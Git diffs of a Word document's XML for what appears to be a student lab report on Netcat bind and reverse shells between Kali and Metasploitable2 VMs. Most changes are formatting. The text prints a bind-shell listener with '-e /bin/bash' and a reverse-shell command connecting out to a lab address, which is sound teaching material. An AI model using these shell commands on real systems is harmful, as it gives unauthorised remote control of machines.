--- a/tools/Netcat_NC/Binding and Reverse Shell/Bind_Reverse_Shell.docx
+++ b/tools/Netcat_NC/Binding and Reverse Shell/Bind_Reverse_Shell.docx
@@ -95,7 +95,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Emmanuel Aidoo</w:t>
+        <w:t>Aidoo</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -324,12 +324,6 @@
         <w:gridCol w:w="7036"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -363,12 +357,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -430,12 +418,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -495,12 +477,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -560,12 +536,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -625,12 +595,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -711,12 +675,6 @@
         <w:gridCol w:w="7035"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -750,12 +708,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -817,12 +769,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -882,12 +828,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -947,12 +887,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -1064,12 +998,6 @@
         <w:gridCol w:w="10030"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -1102,12 +1030,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -1355,12 +1277,6 @@
         <w:gridCol w:w="7036"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -1394,12 +1310,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -1461,12 +1371,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -1526,12 +1430,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -1591,12 +1489,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -1656,12 +1548,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -1721,12 +1607,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -1806,12 +1686,6 @@
         <w:gridCol w:w="10020"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -1903,12 +1777,6 @@
         <w:gridCol w:w="10030"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -1942,12 +1810,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -2259,12 +2121,6 @@
         <w:gridCol w:w="7036"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -2298,12 +2154,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -2365,12 +2215,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -2430,12 +2274,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -2495,12 +2333,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -2560,12 +2392,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -2625,12 +2451,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>
@@ -2710,12 +2530,6 @@
         <w:gridCol w:w="10020"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:trPr>
           <w:cantSplit/>
         </w:trPr>

--- a/tools/Netcat_NC/Binding and Reverse Shell/Bind_Reverse_Shell.docx
+++ b/tools/Netcat_NC/Binding and Reverse Shell/Bind_Reverse_Shell.docx
@@ -27,6 +27,7 @@
         <w:spacing w:before="260" w:after="100"/>
         <w:jc w:val="center"/>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -35,7 +36,18 @@
           <w:sz w:val="60"/>
           <w:szCs w:val="60"/>
         </w:rPr>
-        <w:t>Netcat (nc)</w:t>
+        <w:t>Netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="60"/>
+          <w:szCs w:val="60"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (nc)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -67,7 +79,29 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>Hands-on lab practicals using Netcat between a Kali Linux VM and a Metasploitable2 target VM on a private VirtualBox host-only network.</w:t>
+        <w:t xml:space="preserve">Hands-on lab practicals using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4D4D4D"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4D4D4D"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> between a Kali Linux VM and a Metasploitable2 target VM on a private VirtualBox host-only network.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -95,7 +129,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Aidoo</w:t>
+        <w:t>Emmanuel Aidoo</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -286,7 +320,43 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>Earlier practicals used a raw Netcat connection to move a file, hold a chat, scan ports, and grab a service banner. The -e flag takes this a step further: instead of Netcat printing what it reads and writes to the screen, it hands the connection to a program, so that program's input and output travel over the network instead of the local terminal. Passing -e /bin/bash attaches a Bash shell to the connection, letting one machine run commands on the other and see the output.</w:t>
+        <w:t xml:space="preserve">Earlier practicals used a raw </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> connection to move a file, hold a chat, scan ports, and grab a service banner. The -e flag takes this a step further: instead of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> printing what it reads and writes to the screen, it hands the connection to a program, so that program's input and output travel over the network instead of the local terminal. Passing -e /bin/bash attaches a Bash shell to the connection, letting one machine run commands on the other and see the output.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -636,13 +706,23 @@
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="262626"/>
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>Netcat (nc), traditional version, as installed on Kali and Metasploitable2</w:t>
+              <w:t>Netcat</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="262626"/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> (nc), traditional version, as installed on Kali and Metasploitable2</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1071,7 +1151,31 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>$ nc -lvnp 4444 -e /bin/bash</w:t>
+              <w:t>$ nc -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="F0F0F0"/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t>lvnp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="F0F0F0"/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> 4444 -e /bin/bash</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1122,8 +1226,21 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>$ whoami</w:t>
-            </w:r>
+              <w:t xml:space="preserve">$ </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="F0F0F0"/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t>whoami</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -1171,7 +1288,43 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>nc -lvnp 4444 -e /bin/bash tells Netcat to listen (-l) verbosely (-v), skip DNS lookups (-n), on port 4444 (-p 4444), and to hand any connection straight to /bin/bash (-e). Once Kali connected with a plain nc 192.168.56.102 4444, anything typed on the Kali terminal was sent to that Bash process running on Metasploitable2, and Bash's replies were sent back — with no visible prompt, since only the shell's actual output (not its prompt string) travels over a plain pipe like this.</w:t>
+        <w:t>nc -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>lvnp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 4444 -e /bin/bash tells </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to listen (-l) verbosely (-v), skip DNS lookups (-n), on port 4444 (-p 4444), and to hand any connection straight to /bin/bash (-e). Once Kali connected with a plain nc 192.168.56.102 4444, anything typed on the Kali terminal was sent to that Bash process running on Metasploitable2, and Bash's replies were sent back — with no visible prompt, since only the shell's actual output (not its prompt string) travels over a plain pipe like this.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1184,7 +1337,61 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>Running whoami and ls -la from the Kali side confirmed the shell was real and running on the target: whoami returned msfadmin (the account the listener was started as), and ls -la listed Metasploitable2's home directory, including the receiveed.txt file created in an earlier practical.</w:t>
+        <w:t xml:space="preserve">Running </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>whoami</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and ls -la from the Kali side confirmed the shell was real and running on the target: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>whoami</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> returned </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>msfadmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (the account the listener was started as), and ls -la listed Metasploitable2's home directory, including the receiveed.txt file created in an earlier practical.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1252,7 +1459,29 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Figure 1 — Metasploitable2 (left) running the bind-shell listener, and Kali (right) connected to it, running whoami and ls -la on the target.</w:t>
+        <w:t xml:space="preserve">Figure 1 — Metasploitable2 (left) running the bind-shell listener, and Kali (right) connected to it, running </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4D4D4D"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>whoami</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4D4D4D"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and ls -la on the target.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -1424,7 +1653,25 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>nc -lvnp 4444 -e /bin/bash (Metasploitable2)</w:t>
+              <w:t>nc -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="262626"/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t>lvnp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="262626"/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> 4444 -e /bin/bash (Metasploitable2)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1567,6 +1814,7 @@
             <w:pPr>
               <w:keepNext/>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1575,7 +1823,18 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>whoami result</w:t>
+              <w:t>whoami</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> result</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1595,6 +1854,7 @@
             <w:pPr>
               <w:keepNext/>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="262626"/>
@@ -1603,6 +1863,7 @@
               </w:rPr>
               <w:t>msfadmin</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -1851,7 +2112,31 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>$ nc -lvnp 4444</w:t>
+              <w:t>$ nc -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="F0F0F0"/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t>lvnp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="F0F0F0"/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> 4444</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1902,8 +2187,21 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>$ whoami</w:t>
-            </w:r>
+              <w:t xml:space="preserve">$ </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="F0F0F0"/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t>whoami</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -1934,8 +2232,21 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>$ cd kali_Documents</w:t>
-            </w:r>
+              <w:t xml:space="preserve">$ cd </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="F0F0F0"/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t>kali_Documents</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -2015,7 +2326,43 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>This time Kali started the listener first with nc -lvnp 4444 — verbose, numeric, listening on port 4444 — and simply waited. On Metasploitable2, nc -e /bin/bash 192.168.56.101 4444 connected out to Kali's address and port and attached its own Bash process to that outgoing connection. As soon as the connection landed, the shell prompt on Kali's terminal effectively became Metasploitable2's shell: every command typed there (whoami, ls -la, cd, touch) ran on the target, not on Kali.</w:t>
+        <w:t>This time Kali started the listener first with nc -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>lvnp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 4444 — verbose, numeric, listening on port 4444 — and simply waited. On Metasploitable2, nc -e /bin/bash 192.168.56.101 4444 connected out to Kali's address and port and attached its own Bash process to that outgoing connection. As soon as the connection landed, the shell prompt on Kali's terminal effectively became Metasploitable2's shell: every command typed there (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>whoami</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>, ls -la, cd, touch) ran on the target, not on Kali.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2028,7 +2375,61 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>The commands confirmed this: whoami again returned msfadmin, and ls -la showed the same Metasploitable2 home directory as the bind shell. Changing into kali_Documents and creating names.txt with touch, then listing the directory again to see it appear, demonstrated that this is a fully interactive, persistent shell — not a one-off command — capable of navigating the filesystem and creating files, exactly like a normal terminal session on the target.</w:t>
+        <w:t xml:space="preserve">The commands confirmed this: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
